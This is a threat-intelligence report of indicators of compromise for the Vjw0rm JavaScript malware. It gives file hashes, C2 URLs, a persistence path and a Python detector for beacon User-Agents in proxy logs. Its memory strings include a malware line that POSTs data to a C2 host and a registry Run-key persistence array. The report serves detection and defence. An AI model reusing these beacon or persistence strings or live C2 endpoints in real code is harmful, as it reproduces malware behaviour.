forked from executemalware/Malware-IOCs
2021-08-18 Vjw0rm IOCs
THREAT IDENTIFICATION: VjW0rm
NOTES
A copy of the original .js file is placed in the user's Startup folder for persistence:
C:\Users\analyst\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
The C2 traffic had an unusual User-Agent string:
"CASHFLOW$$$_5C7A2FEE\<pcname>\<user>\<OS>\undefined\YES\FALSE".
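As an added example (not part of the original report), the following Python parses the beacon User-Agent format noted above into its fields and scans proxy log lines for that User-Agent or for the two C2 hosts listed in this report. The proxy log format and the sample lines are constructed assumptions; the meaning of the trailing three User-Agent fields is not stated in the report, so they are kept as opaque flags.

```python
import re
from urllib.parse import urlsplit

# C2 hosts listed in this report.
KNOWN_C2_HOSTS = {"severdops.dddns.net", "bethhavens.duia.ro"}

# Beacon User-Agent seen in the report: fixed "CASHFLOW$$$_" prefix, a hex id,
# then backslash-separated fields. Field names follow the report's placeholders
# (pcname, user, OS); the remaining fields are kept as opaque flags (assumption).
UA_RE = re.compile(
    r"^CASHFLOW\$\$\$_(?P<id>[0-9A-Fa-f]+)\\(?P<pcname>[^\\]*)\\(?P<user>[^\\]*)"
    r"\\(?P<os>[^\\]*)\\(?P<flags>.*)$"
)

# Constructed proxy log format (assumption): time client method url "user-agent"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')

# Constructed sample log lines; hostnames and ports come from the report.
SAMPLE_LOGS = [
    r'2021-08-18T09:12:01Z 10.0.0.5 POST http://severdops.dddns.net:1216/Vre "CASHFLOW$$$_5C7A2FEE\WS-042\jsmith\Windows 10\undefined\YES\FALSE"',
    r'2021-08-18T09:12:07Z 10.0.0.5 GET http://example.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    r'2021-08-18T09:13:44Z 10.0.0.9 POST http://bethhavens.duia.ro:62104/Vre "CASHFLOW$$$_1A2B3C4D\LAPTOP-7\alice\Windows 7\undefined\NO\FALSE"',
    r'2021-08-18T09:14:02Z 10.0.0.9 GET http://bethhavens.duia.ro:62104/ "Mozilla/5.0"',
]

def parse_vjw0rm_ua(ua: str):
    """Return the beacon fields as a dict, or None if the UA is not in VjW0rm's format."""
    m = UA_RE.match(ua)
    if not m:
        return None
    fields = m.groupdict()
    fields["flags"] = fields["flags"].split("\\")
    return fields

def scan_proxy_log(lines):
    """Flag lines whose User-Agent matches the beacon format or whose host is a known C2."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, client, _method, url, ua = m.groups()
        host = urlsplit(url).hostname or ""
        beacon = parse_vjw0rm_ua(ua)
        if beacon is None and host not in KNOWN_C2_HOSTS:
            continue
        hits.append({"time": ts, "client": client, "host": host,
                     "reason": "vjw0rm-ua" if beacon else "known-c2-host",
                     "beacon": beacon})
    return hits
```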
SUBJECTS OBSERVED
See Attched (sic)
SENDERS OBSERVED
MALDOC FILE HASHES
Remittance-634731.zip
0bb146711b483042b92464a978656575
Contains:
Remittance-634731.js
511f6a9de220c99adf7e2e03a4e48886
VJW0RM SECONDARY JS FILE
PhOPzJgSgd.js
398ea7fcde0fe6de66a488b8d0df37b3
VJW0RM C2
http://severdops.dddns.net:1216/Vre
I SAW DNS QUERIES FOR:
bethhavens.duia.ro
ADDITIONAL STRINGS IN MEMORY
http://bethhavens.duia.ro:62104/Vre
X.open('POST','http://bethhavens.duia.ro:62104/' + C, false);
["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
SUPPORTING EVIDENCE
https://app.any.run/tasks/bbc7864f-4d1c-4f76-866c-8caefdc00219/
https://www.virustotal.com/gui/file/2a830c7923253031907c1dd34c4a9532c1f53e8fe7f6a3c8359a0e93ef4b216e/detection
https://tria.ge/210818-qt34f97lvs